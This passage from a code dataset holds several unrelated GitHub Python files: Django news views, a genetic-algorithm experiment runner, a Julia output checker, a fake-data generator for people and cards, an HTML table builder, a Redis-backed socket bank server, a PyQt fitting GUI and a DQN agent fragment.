New article in your favorite section!».',\n message=f'{text[:50]}',\n from_email='marija.utochkina@yandex.ru',\n recipient_list=[mail],\n )\n return HttpResponseRedirect('/news/')\n\n return render(request, 'article_edit.html', {'form': form})\n else:\n return HttpResponseRedirect('/news/')\n\n\nclass NewUpdate(PermissionRequiredMixin, UpdateView):\n permission_required = ('news.change_post',)\n form_class = NewForm\n model = Post\n template_name = 'new_edit.html'\n\n\nclass NewDelete(PermissionRequiredMixin, DeleteView):\n permission_required = ('news.delete_post',)\n model = Post\n template_name = 'new_delete.html'\n success_url = reverse_lazy('news_list')\n\n\nclass ArticleUpdate(PermissionRequiredMixin, UpdateView):\n permission_required = ('news.change_post',)\n form_class = NewForm\n model = Post\n template_name = 'article_edit.html'\n\n\nclass ArticleDelete(PermissionRequiredMixin, DeleteView):\n permission_required = ('news.delete_post')\n model = Post\n template_name = 'article_delete.html'\n success_url = reverse_lazy('articles_list')\n\n\nclass UserTemplate(LoginRequiredMixin, TemplateView):\n template_name = 'flatpages/default.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['is_not_authors'] = not self.request.user.groups.filter(name='authors').exists()\n return context\n\n\nclass IndexView(View):\n def get(self, request):\n # printer.apply_async([10], countdown=10)\n # hello.delay()\n send_mail_every_week.delay()\n return HttpResponse('Hello!')\n\n\n\n","repo_name":"MariyaGudilina/DjangoProjects","sub_path":"projectNews/NewsPaper/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39065216926","text":"from bisection import Bisection\nimport argparse\nimport numpy as np \n\ndef option():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-t\", \"--times\", type = int,default=10,\n help=\"run_multiple_times in 1 Bisection\")\n\n ap.add_argument(\"-m\", \"--mssv\", type = int, required=True, help=\"MSSV\")\n\n ap.add_argument(\"-p\", \"--problem\",type=str, required=True, help=\"Type Problem\")\n\n ap.add_argument(\"-c\", \"--crossover\",type=str, required=True,help=\"Type cross_over\") \n\n ap.add_argument(\"-n\", \"--tournament\", type = int, default=4, help=\"Tournament Size\")\n args = vars(ap.parse_args())\n return args\n\ndef run_Bisections(times_bisections, times, seed, type_problem, type_crossover, problem_size,tournament_size):\n evals = []\n MRPS = []\n \n for i in range(times_bisections):\n \n print(\"RUN BISECTION WITH RANDOM_SEED: == {}.format(seed)\")\n \n bi = Bisection(times, seed, type_problem, type_crossover, problem_size,tournament_size)\n \n e, m, success = bi.run()\n \n path_file_eval = \"Data/Eval/\" + type_problem + \"_\" + type_crossover + \"_\" + str(problem_size) + \".txt\"\n path_file_mrps = \"Data/MRPS/\" + type_problem + \"_\" + type_crossover + \"_\" + str(problem_size) + \".txt\"\n \n with open( path_file_eval, 'a') as f:\n f.write(str(e) + \" \")\n\n with open( path_file_mrps, 'a') as f:\n f.write(str(m) + \" \")\n \n if success:\n evals.append(e)\n MRPS.append(m)\n seed += 10\n\n return evals, MRPS, True\n\ndef main():\n args = option()\n problems_size = [10,20,40,80,160]\n\n times_bisections = 10\n\n for i in problems_size:\n print(\"BEGIN EXPERIMENT : Type Problem _ {} , Type Cross_over _ {}, Problem_size _ {}\".\n format(args[\"problem\"], 
args[\"crossover\"], i))\n\n        evals, MRPS, success = run_Bisections(times_bisections, args[\"times\"], args[\"mssv\"], \n                            args[\"problem\"], args[\"crossover\"], i, args[\"tournament\"])\n\n        print(\"evals: {}\".format(evals))\n        eval_std = np.std(evals)\n        print(\"----> avg evals: {} with std of {}\".format(np.mean(evals),eval_std))\n\n        print(\"MRPS: {}\".format(MRPS))\n        mrps_std = np.std(MRPS)\n        print(\"----> avg MRPS: {} with std of {}\".format(np.mean(MRPS),mrps_std))\n\nif __name__ == \"__main__\":\n    main()","repo_name":"PhamLeQuangNhat/Genetic_Algorithm_Learning_Projects","sub_path":"Onemax/run_main.py","file_name":"run_main.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17970866433","text":"import os\nimport os.path\nfrom .JuliaErrorVisualizer import JuliaErrorVisualizer\n\n\nclass JuliaOutputChecker:\n\n    def __init__(self, dr):\n        self.work_directory = dr\n        self.file_starts_string = \"Result_\"\n        self.file_ends_string = \".csv\"\n        self.h8760 = 8760\n        self.report = {}\n        self.REPORT_ERROR_NOT_FLOAT = \"CAN'T_CONVERT_TO_FLOAT\"\n        self.REPORT_ERROR_NOT_A_NUMBER = \"CONTENT IS NaN\"\n\n    def check(self):\n        if not os.path.isdir(self.work_directory):\n            return\n        for f in os.listdir(self.work_directory):\n            file = os.path.join(self.work_directory, f)\n            if os.path.isfile(file):\n                if str(f).startswith(self.file_starts_string) and str(f).endswith(self.file_ends_string):\n                    with open(file, \"r\") as fr:\n                        for i in range(self.h8760):\n                            line = fr.readline()\n                            try:\n                                line = float(line)\n                            except ValueError:\n                                self.add_to_report(f, self.REPORT_ERROR_NOT_FLOAT)\n                                break\n                            if not line == line:  # NaN is the only float not equal to itself\n                                self.add_to_report(f, self.REPORT_ERROR_NOT_A_NUMBER)\n                                break\n\n    def visualize(self):\n        julia_error_visualizer = JuliaErrorVisualizer(self.report)\n        julia_error_visualizer.visualize()\n\n    def add_to_report(self, file, error):\n        self.report[str(file)] = error\n\n    def clear_report(self):\n        self.report = {}\n\n    def get_report(self):\n        return self.report\n\n    def set_folder(self, folder):\n        self.work_directory = folder\n\n\n\n","repo_name":"Planheat/Planheat-Tool","sub_path":"planning_and_simulation_modules/Tjulia/checks/JuliaOutputChecker.py","file_name":"JuliaOutputChecker.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3201316480","text":"import sqlalchemy as db\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom mimesis import Generic\r\nimport argparse\r\nimport logging\r\nfrom os import path\r\nimport random\r\n\r\nlogging.basicConfig(\r\n    level=logging.INFO,\r\n    format=\"{asctime} {levelname} {message}\",\r\n    style='{'\r\n)\r\n\r\nBase = declarative_base()\r\n\r\nclass People(Base):\r\n    \"\"\"\r\n    A model that describes a person with the following variables:\r\n    id, full_name, nationality, age, job, phone, email.\r\n    \r\n    \"\"\"\r\n    __tablename__ = \"people\"\r\n\r\n    id = db.Column(\"id\", db.Integer, primary_key=True)\r\n    full_name = db.Column(\"fullname\", db.String)\r\n    age = db.Column(\"age\", db.Integer)\r\n    job = db.Column(\"job\", db.String)\r\n    phone = db.Column(\"phone\", db.String)\r\n    email = db.Column(\"email\", db.String)\r\n    nationality = db.Column(\"nationality\", db.String)\r\n    country = db.Column(\"country\", db.String)\r\n    city = db.Column(\"city\", db.String)\r\n    street = db.Column(\"street\", db.String)\r\n    house = 
db.Column(\"house\", db.Integer)\r\n    zip_code = db.Column(\"zip_code\", db.Integer)\r\n\r\n    def __init__(self, **kwargs):\r\n        super(People, self).__init__(**kwargs)\r\n\r\n    def bootstrap(count, locale: str):\r\n        \"\"\"A function that generates random values for the people model and \r\n        automatically commits them to the database.\r\n\r\n        Args:\r\n            count (int): The amount of data to generate\r\n            locale (str): Local data to be used for generation\r\n        \"\"\"\r\n        \r\n        maxGen = 5000 #limiting the maximum number of data generations\r\n        \r\n        if 0 <= count <= maxGen:\r\n            generic = Generic(locale)\r\n            \r\n            for _ in range(count):\r\n                people = People(\r\n                    full_name = generic.person.full_name(),\r\n                    nationality = generic.person.nationality(),\r\n                    age = generic.person.age(minimum=16, maximum=100),\r\n                    job = generic.person.occupation(),\r\n                    phone = generic.person.telephone(),\r\n                    email = generic.person.email(),\r\n                    country = generic.address.country(),\r\n                    city = generic.address.city(),\r\n                    street = generic.address.street_name(),\r\n                    house = generic.address.street_number(maximum=400),\r\n                    zip_code = generic.address.zip_code()\r\n                )\r\n                session.add(people)\r\n            session.commit()\r\n        else: logging.error(\"The number of instances of model 'People' is not in the range: 0 : 5000\") \r\n    \r\n    def count_people():\r\n        \"\"\"A function that generates a random id of a person who is in the database\r\n\r\n        Returns:\r\n            int: Returns a random id\r\n        \"\"\"\r\n        ids = []  # renamed from 'list' to avoid shadowing the built-in\r\n        for val in session.query(People.id).distinct():\r\n            ids.append(val[0])\r\n        \r\n        values = ids[random.randint(0, len(ids)-1)]\r\n        return values\r\n\r\n\r\nclass Card(Base):\r\n    \"\"\"\r\n    A model that describes someone's credit card with the following variables:\r\n    id, number, data, cvv, validity, owner.\r\n\r\n    \"\"\"\r\n    __tablename__ = \"card\"\r\n\r\n    id = db.Column(\"id\", db.Integer, primary_key=True)\r\n    number = db.Column(\"number\", db.Integer)\r\n    date = db.Column(\"date\", db.String)\r\n    cvv = db.Column(\"cvv\", db.String)\r\n    creation_date = db.Column(\"creation_date\", db.String)\r\n    owner_id = db.Column(\"owner\", db.Integer, db.ForeignKey(\"people.id\"))\r\n\r\n    def __init__(self, **kwargs):\r\n        super(Card, self).__init__(**kwargs)\r\n\r\n    def bootstrap(count, locale: str):\r\n        \"\"\"A function that generates random values for the card model and \r\n        automatically commits them to the database.\r\n\r\n        Args:\r\n            count (int): The amount of data to generate\r\n            locale (str): Local data to be used for generation\r\n        \"\"\"\r\n        \r\n        maxGen = 5000 #limiting the maximum number of data generations\r\n        \r\n        if 0 <= count <= maxGen:\r\n            generic = Generic(locale)\r\n            \r\n            for _ in range(count):\r\n                card = Card(\r\n                    number = generic.payment.credit_card_number(),\r\n                    date = generic.payment.credit_card_expiration_date(minimum=23, maximum=28),\r\n                    cvv = generic.payment.cvv(),\r\n                    creation_date = generic.datetime.date(start=2018, end=2023),\r\n                    owner_id = People.count_people()\r\n                ) \r\n                session.add(card)\r\n            session.commit()\r\n        else: logging.error(\"The number of instances of model 'Card' is not in the range: 0 : 5000\")\r\n\r\ndef delete(val):\r\n    \"\"\"The function that is used to delete a person and his card.\r\n\r\n    Args:\r\n        val (int): ID of the person and cardholder to delete\r\n    \"\"\"\r\n    session.query(People).filter(People.id == val).delete()\r\n    session.query(Card).filter(Card.owner_id == val).delete()\r\n    session.commit()\r\n\r\ndef pars():\r\n    \"\"\"Parses the command-line arguments and generates the amount of data that the \r\n    user requests through the console.\r\n\r\n    \"\"\"\r\n    parser = argparse.ArgumentParser()\r\n\r\n    parser.add_argument(\"it_people\", type=int, help=\"Number of iterations for model 'People'\")\r\n    parser.add_argument(\"it_card\", type=int, help=\"Number of iterations for model 'Card'\")\r\n    # parser.add_argument(\"it_delete\", type=int, help=\"ID of the person and cardholder to delete\")\r\n\r\n    args = parser.parse_args()\r\n\r\n    People.bootstrap(args.it_people,\"en\")\r\n    Card.bootstrap(args.it_card,\"en\")\r\n\r\n    # delete(args.it_delete)\r\n\r\nif __name__ == \"__main__\":\r\n    engine = db.create_engine(\"sqlite:///base.db\", echo=False)\r\n    if not path.exists(\"base.db\"):  # path.exists() expects a filesystem path, not the SQLAlchemy URL\r\n        Base.metadata.create_all(bind=engine)\r\n\r\n    Session = sessionmaker(bind=engine)\r\n    session = Session()\r\n    logging.info(\"The database has been updated!\")\r\n\r\n    pars()\r\n","repo_name":"Yammili/Model-with-fake-data","sub_path":"bank_sql_mimesis.py","file_name":"bank_sql_mimesis.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42830450325","text":"import os\nimport argparse\nfrom string import Template\n\n\nprefix_cover = 'icon-cover'\nprefix_small = 'icon-s'\nprefix_medium = 'icon-m'\nprefix_large = 'icon-l'\n\nfile_format = '.svg'\n\n\ndef parse_arguments():\n    \"\"\"\n    Parse arguments from command line\n    :return: argparse.Namespace\n    \"\"\"\n    get_cwd = os.getcwd()\n\n    parser = argparse.ArgumentParser(description='Create html page with tables')\n    parser.add_argument('-i', '--icons_dir', type=str, default='icons',\n                        help='Path to directory with icons')\n    parser.add_argument('-t', '--template', type=str, default=os.path.join(get_cwd, 'template.html'),\n                        help='Path to HTML template file')\n    parser.add_argument('-o', '--output', type=str, default=os.path.join(get_cwd, 'rendered.html'),\n                        help='Path to output HTML file')\n    parser.add_argument('--cover', action='store_true', dest='generate_cover',\n                        help='Generate table with icons with prefix \"{}\"'.format(prefix_cover))\n    parser.add_argument('--small', action='store_true', dest='generate_small',\n                        help='Generate table with icons with prefix \"{}\"'.format(prefix_small))\n    parser.add_argument('--medium', action='store_true', dest='generate_medium',\n                        help='Generate table with icons with prefix \"{}\"'.format(prefix_medium))\n    parser.add_argument('--large', action='store_true', dest='generate_large',\n                        help='Generate table with icons with prefix \"{}\"'.format(prefix_large))\n\n    return parser.parse_args()\n\n\ndef create_table_with_files(file_paths, indent=0, img_class=None, columns=1):\n    \"\"\"\n    Creates a simple table with indent and columns with 2 cells:\n    first cell - name of the file\n    second cell - img tag with class img_class\n    :param file_paths: list\n    :param indent: int\n    :param img_class: str\n    :param columns: int\n    :return: str\n    \"\"\"\n    table_tag = '<table>\\n{}' + ' ' * indent + '</table>'\n    row_tag = ' ' * indent + '  <tr>{}</tr>\\n'\n    cell_tag = '<td>{}</td>'\n    if img_class:\n        img_tag = '<img class=\"' + img_class + '\" src=\"{}\">'\n    else:\n        img_tag = '<img src=\"{}\">'\n\n    counter_columns = 0\n    rows = ''\n    cells = ''\n    for file_path in file_paths:\n        filename = os.path.basename(file_path)\n\n        name_cell = cell_tag.format(filename[:-len(file_format)])  # str.strip() removes characters, not a suffix\n\n        img_cell = img_tag.format(file_path)\n        image_cell = cell_tag.format(img_cell)\n\n        cells += image_cell + name_cell\n\n        counter_columns += 1\n\n        if counter_columns >= columns:\n            rows += row_tag.format(cells)\n            counter_columns = 0\n            cells = ''\n\n    return table_tag.format(rows)\n\n\ndef count_indent(text, template):\n    \"\"\"\n    Count indent before template in the text and returns count of spaces\n    :param text: str\n    :param template: str\n    :return: int\n    \"\"\"\n    template_index = text.find(template)\n    indent = 0\n    while text[template_index - 1 - indent] == ' ':\n        indent += 1\n\n    return indent\n\n\nif __name__ == '__main__':\n    arguments = parse_arguments()\n\n    with open(arguments.template, 'r') as f:\n        html_template = f.read()\n\n    # Default - if no prefix flag is set, all prefixes will be shown in the tables,\n    # otherwise only the prefixes that are set will be shown\n    if (arguments.generate_cover or arguments.generate_small or\n            arguments.generate_medium or arguments.generate_large) is False:\n        arguments.generate_cover = arguments.generate_small = True\n        arguments.generate_medium = arguments.generate_large = True\n\n    listdir = os.listdir(arguments.icons_dir)\n    svg_files = [item for item in listdir if item.endswith(file_format)]\n\n    if arguments.generate_cover:\n        svg_files_cover = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_cover)]\n        cover_indent = count_indent(html_template, '$cover_table')\n        table_cover = create_table_with_files(svg_files_cover, indent=cover_indent, img_class='cover', columns=4)\n        html_template = Template(html_template).safe_substitute(cover_table=table_cover)\n\n    if arguments.generate_small:\n        svg_files_small = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_small)]\n        small_indent = count_indent(html_template, '$small_table')\n        table_small = create_table_with_files(svg_files_small, indent=small_indent, img_class='small', columns=3)\n        html_template = Template(html_template).safe_substitute(small_table=table_small)\n\n    if arguments.generate_medium:\n        svg_files_medium = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_medium)]\n        medium_indent = count_indent(html_template, '$medium_table')\n        table_medium = create_table_with_files(svg_files_medium, indent=medium_indent, img_class='medium', columns=2)\n        html_template = Template(html_template).safe_substitute(medium_table=table_medium)\n\n    if arguments.generate_large:\n        svg_files_large = [os.path.join(arguments.icons_dir, item) for item in svg_files if item.startswith(prefix_large)]\n        large_indent = count_indent(html_template, '$large_table')\n        table_large = create_table_with_files(svg_files_large, indent=large_indent, img_class='large', columns=2)\n        html_template = Template(html_template).safe_substitute(large_table=table_large)\n\n    with open(arguments.output, 'w') as f:\n        f.write(html_template)\n","repo_name":"SupFear/insert_tables","sub_path":"insert_tables.py","file_name":"insert_tables.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44650141168","text":"import socket,redis,json\nfrom 
redlock import RedLock\ndef report_json(accounts):\n\treport = {}\n\tfor account in accounts:\n\t\treport[account] = int(r.get(account))\n\treturn json.dumps(report)\ndef init_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == True :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\tif \tmoney<0:\n\t\treturn 'error'\n\tr.set(command[1],money)\n\treturn report_json([command[1],])\ndef save_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == False :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\tif \tmoney<0:\n\t\treturn 'error'\n\tr.incr(command[1],money)\n\treturn report_json([command[1],])\ndef load_process(command):\n\tcommand[1] = command[1].lower()\n\tif r.exists(command[1]) == False :\n\t\treturn 'error'\n\tmoney = int(command[2])\n\ttotal = int(r.get(command[1]))\n\tif \tmoney<0 or money>total:\n\t\treturn 'error'\n\tr.decr(command[1],money)\n\treturn report_json([command[1],])\ndef remit_process(command):\n\tcommand[1] = command[1].lower()\n\tcommand[2] = command[2].lower()\n\tif command[1] == command[2] or r.exists(command[1])== False or r.exists(command[2]) == False :\n\t\treturn 'error'\n\tmoney = int(command[3])\n\ttotal = int(r.get(command[1]))\n\tif \tmoney<0 or money>total:\n\t\treturn 'error'\n\tr.decr(command[1],money)\n\tr.incr(command[2],money)\n\treturn report_json([command[1],command[2]])\ndef end_process():\n\tr.flushdb()\n\treturn 'over'\ndef process_command(command):\n\tcommand = command.decode('utf-8').split(' ')\n\ttype = \tcommand[0]\n\tif type == 'init':\n\t\treturn init_process(command)\n\telif type == 'save':\n\t\treturn save_process(command)\n\telif type == 'load':\n\t\treturn load_process(command)\n\telif type == 'remit':\n\t\treturn remit_process(command)\n\telse:\n\t\treturn end_process()\n\n\t\t\n\t\t\n\nlock = RedLock(\"distributed_lock\", \nconnection_details=[{'host': '192.168.111.128', 'port': 6379, 'db': 0},]\n)\nr = redis.Redis(host='192.168.111.128',port=6379,db=0)\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('0.0.0.0',8888))\ns.listen(1)\nwhile(1):\n\tc,ip = s.accept()\n\tprint(ip)\n\twhile 1:\t\n\t\tcommand = c.recv(1024);\n\t\tif command:\n\t\t\tlock.acquire()\n\t\t\tret = process_command(command).encode('utf-8')\n\t\t\tc.sendall(ret)\n\t\t\tlock.release()\n\t\telse:\n\t\t\tbreak;\n","repo_name":"st424204/OS-HW","sub_path":"HW-4/code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"424141688","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QFrame, QApplication, QPushButton, QRadioButton, QLabel, QComboBox, QLineEdit, QFileDialog, QMessageBox\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QGridLayout\nfrom matplotlib.figure import Figure\nfrom calculateQ import baseQ\nfrom draggable import PlotCanvas\nfrom graph import Graph\nfrom process import readlvm\nimport csv\nimport os\n\n\nclass MainWindow(QFrame):\n canvas = None\n\n def __init__(self, parent=None):\n super(MainWindow, self).__init__()\n\n self.setWindowTitle(\"Q\") \n self.setObjectName('Main')\n self.setStyleSheet(open(\"QSS/mainwindow.qss\", \"r\").read())\n self.resize(900, 600)\n \n self.parent = parent\n\n self.setButtons()\n self.setLabels()\n self.setLayouts()\n\n def setButtons(self):\n ''' Set all buttons here. 
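Each button follows one pattern: an icon from ./resource, a tooltip, then a handler connected via clicked.connect (descriptive note added for clarity; the commented-out setText/setFixedWidth calls are kept for reference). 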
'''\n self.Load = QPushButton(self) # PushButton 'Load'\n #self.Load.setText(u\"Open\")\n #self.Load.setFixedWidth(90)\n self.Load.setIcon(QIcon('./resource/icons8-open-100.png')) \n self.Load.setIconSize(QtCore.QSize(30,30)) \n self.Load.setToolTip('Open the base file')\n self.Load.clicked.connect(self.openQ)\n\n self.Run = QPushButton(self) # PushButton 'Run'\n # self.Run.setText(u\"Load\")\n # self.Run.setFixedWidth(90)\n self.Run.setIcon(QIcon('./resource/icons8-start-100.png'))\n self.Run.setIconSize(QtCore.QSize(30,30)) \n self.Run.setToolTip('Start calculating')\n self.Run.clicked.connect(self.process)\n\n self.Fit = QPushButton(self) # PushButton 'Run'\n # self.Fit.setText(u\"Fit\")\n # self.Fit.setFixedWidth(90)\n self.Fit.setIcon(QIcon('./resource/icons8-line-chart-100.png'))\n self.Fit.setIconSize(QtCore.QSize(30,30)) \n self.Fit.setToolTip('Fitting selected points')\n self.Fit.clicked.connect(self.fit)\n\n self.Export = QPushButton(self)\n # self.Export.setText(u\"Export\")\n # self.Export.setFixedWidth(90)\n self.Export.setIcon(QIcon('./resource/icons8-export-csv-100.png'))\n self.Export.setIconSize(QtCore.QSize(30,30)) \n self.Export.setToolTip('Export data as csv file')\n self.Export.clicked.connect(self.export)\n\n self.Reset = QPushButton(self)\n # self.Reset.setText(u\"Reset\")\n # self.Reset.setFixedWidth(90)\n self.Reset.setIcon(QIcon('./resource/icons8-synchronize-100.png'))\n self.Reset.setIconSize(QtCore.QSize(30,30)) \n self.Reset.setToolTip('Reset all')\n self.Reset.clicked.connect(self.reset)\n\n self.Unfit = QPushButton(self) # PushButton 'Run'\n # self.Unfit.setText(u\"Unfit\")\n # self.Unfit.setFixedWidth(90)\n self.Unfit.setIcon(QIcon('./resource/icons8-undo-100.png'))\n self.Unfit.setIconSize(QtCore.QSize(30,30)) \n self.Unfit.setToolTip('Cancel Fitting')\n self.Unfit.clicked.connect(self.unfit)\n\n self.b1 = QRadioButton(\"1 Peak\")\n self.b1.setChecked(True)\n self.b2 = QRadioButton(\"2 Peaks\")\n \n def setLabels(self):\n ''' Set all labels here. '''\n self.modulation = QLabel(self)\n self.modulation.setText(\"Modulation Coefficient:\")\n self.comboBox = QComboBox(self)\n self.comboBox.setObjectName(\"comboBox\")\n self.comboBox.addItem(\"0.025 (633)\")\n self.comboBox.addItem(\"0.036 (633)\")\n self.comboBox.addItem(\"0.0083 (633)\")\n self.comboBox.addItem(\"0.038 (765)\")\n self.comboBox.addItem(\"0.033 (765)\")\n self.comboBox.addItem(\"0.049 (980)\")\n self.comboBox.addItem(\"0.036 (980)\")\n self.comboBox.addItem(\"0.043 (1064)\")\n self.comboBox.addItem(\"0.089 (1330)\")\n self.comboBox.addItem(\"0.052 (1550)\")\n\n self.lambda_tag = QLabel(self)\n self.lambda_tag.setText(\"Starting lambda:\")\n self.slambda = QLineEdit()\n # self.slope.setValidator(QIntValidator())\n self.slambda.setText(\"1572.42\")\n self.slambda.setAlignment(Qt.AlignRight)\n\n self.slope_tag = QLabel(self)\n self.slope_tag.setText(\"Slope:\")\n self.slope = QLineEdit()\n # self.slope.setValidator(QIntValidator())\n self.slope.setText(\"396.5\")\n self.slope.setAlignment(Qt.AlignRight)\n \n self.result = QLabel(self) # Label 'Output_image'\n self.result.setObjectName(\"OutputImg\")\n # self.result.setFixedHeight(25) \n # self.result.setFixedWidth(300) \n\n def setLayouts(self):\n ''' Set layout here. 
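The graph and canvas widgets sit above a single control row holding the inputs and buttons (descriptive note added for clarity). 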
'''\n self.mainLayout = QVBoxLayout()\n self.resultLayout = QHBoxLayout()\n self.drawLayout = QHBoxLayout()\n self.graphLayout = QGridLayout()\n self.functionLayout = QHBoxLayout()\n\n self.functionLayout.addWidget(self.modulation, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.comboBox, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.lambda_tag, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slambda, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slope_tag, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.slope, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.b1)\n self.functionLayout.addWidget(self.b2)\n\n\n self.resultLayout.addWidget(self.result, 0, Qt.AlignCenter)\n\n self.graph = Graph()\n self.canvas = PlotCanvas(self)\n self.graphLayout.addWidget(self.graph, 0, Qt.AlignCenter)\n self.drawLayout.addWidget(self.canvas)\n \n # Button layout\n self.functionLayout.addWidget(self.Load, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Run, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Fit, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Unfit, 0, Qt.AlignCenter)\n \n\n\n # Result layout\n self.functionLayout.addWidget(self.Export, 0, Qt.AlignCenter)\n self.functionLayout.addWidget(self.Reset, 0, Qt.AlignCenter)\n \n\n self.mainLayout.addLayout(self.graphLayout)\n self.mainLayout.addLayout(self.resultLayout)\n self.mainLayout.addLayout(self.drawLayout)\n self.mainLayout.addSpacing(20)\n self.mainLayout.addLayout(self.functionLayout)\n \n self.setLayout(self.mainLayout)\n\n def reset(self):\n print(\"reset\")\n #self.canvas.axes.clear()\n # plt.draw()\n # self.canvas.__init__()\n self.canvas.reset()\n self.graph.reset()\n self.result.setText(\"\")\n #self.canvas.updateFigure()\n #self.canvas.__init__()\n\n def export(self):\n filename = QFileDialog.getSaveFileName(self, 'Save File', \"\", \".csv\")\n #print(filename)\n if (self.b1.isChecked() == True):\n try:\n with open(filename[0]+\".csv\", \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(map(lambda x, y, z: [x, y, z], self.canvas.lambdas, self.canvas.Qs, self.canvas.couplings))\n except (FileNotFoundError):\n pass\n else:\n try:\n with open(filename[0]+\".csv\", \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n left_lambdas, right_lambdas = self.canvas.lambdas[::2], self.canvas.lambdas[1::2]\n left_Qs, right_Qs = self.canvas.Qs[::2], self.canvas.Qs[1::2]\n left_couplings, right_couplings = self.canvas.couplings[::2], self.canvas.couplings[1::2]\n writer.writerows(\"B\")\n writer.writerows(map(lambda x, y, z: [x, y, z], left_lambdas, left_Qs, left_couplings))\n writer.writerows(\"R\")\n writer.writerows(map(lambda x, y, z: [x, y, z], right_lambdas, right_Qs, right_couplings))\n except (FileNotFoundError):\n pass\n\n\n def openQ(self):\n global Qname\n Qname, _ = QFileDialog.getOpenFileName(self, \"Open lvm File\", \"\", \" *.lvm;;All Files (*)\")\n Qname = os.path.normpath(Qname)\n try:\n exp = Qname[:-5] + \"1.lvm\"\n self.graph.show()\n self.graph.plot(readlvm(exp))\n except (FileNotFoundError):\n pass\n\n def process(self):\n if (self.b1.isChecked() == True):\n Qs, couplings, lambdas = baseQ(Qname, self.slambda.text(), self.slope.text(), self.comboBox.currentText(), 1)\n self.canvas.setParameter(Qs, couplings, lambdas)\n self.canvas.plot(1)\n self.canvas.updateFigure()\n else:\n fit_range = self.graph.calcRange()\n rg = 0\n if fit_range < 250:\n rg = 1500\n elif fit_range < 500:\n rg = 3000\n elif 
fit_range < 1000:\n                rg = 5000\n            else:\n                rg = 6000\n            Qs, couplings, lambdas = baseQ(Qname, self.slambda.text(), self.slope.text(), self.comboBox.currentText(), 2, rg)\n            self.canvas.setParameter(Qs, couplings, lambdas)\n            self.canvas.plot(2)\n            self.canvas.updateFigure()\n            # import numpy as np\n            # x = np.asarray(couplings[:-1], dtype='float')\n            # Y = np.asarray(Qs[:-1], dtype='float')\n            # A = np.vstack([x, np.ones(len(x))]).T\n            # m, c = np.linalg.lstsq(A, Y, rcond=None)[0]\n            # self.canvas.create_draggable_points(x.min(), m*x.min()+c, x.max(), m*x.max()+c, 0.1, 1000000)\n\n    def fit(self):\n        self.canvas.Rsquared()\n\n    def unfit(self):\n        self.canvas.unfit()\n\n    # def export(self):\n    #     self.canvas.export()\n\n    def updateQ(self, intercept, std_err):\n        self.result.setText(str('{:.3e}'.format(intercept))+\"±\"+str('{:.3e}'.format(std_err)))\n\n\n    def alert(self, num):\n        if (num == 1): QMessageBox.about(self, \"Error\", \"No point selected\")\n        if (num == 2): QMessageBox.about(self, \"Error\", \"You should fit first\")\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    main = MainWindow()\n    main.show()\n    sys.exit(app.exec_())","repo_name":"yixuanzhou/Lab-Data-Analysis-Tools","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29172392273","text":"# -*- coding: utf-8 -*-\nfrom collections import deque\nimport random\nimport numpy as np\nfrom dqn import DQN\nimport torch\n\nrandom.seed(42)\n\n# parameters\nN = 10000 # number of steps before updating the weights by copy\n# N = 1000 # number of steps before updating the weights by copy\n\nclass Agent:\n\n    def __init__(self, memory_size, batch_exp_size, input_size, output_size, method_update_weights):\n        self.memory = deque(maxlen=memory_size)\n        self.batch_exp_size = batch_exp_size\n        # neural networks\n        self.policy_network = DQN(\n            input_size=input_size, \n            output_size=output_size\n        )\n        self.target_network = DQN(\n            input_size=input_size, \n            output_size=output_size\n        )\n\n        self.method_update_weights = method_update_weights\n        self.pas = 0\n\n    '''\n    Stores an interaction in the circular buffer\n    '''\n    def memorise_interaction(self, interaction):\n        self.memory.append(interaction)\n\n    '''\n    Checks whether there are enough interactions to train the NN\n    '''\n    def enough_interactions(self):\n        return len(self.memory) >= self.batch_exp_size\n\n    '''\n    Returns a batch of interactions\n    '''\n    def get_batch_exp(self):\n        if len(self.memory) == self.batch_exp_size: # 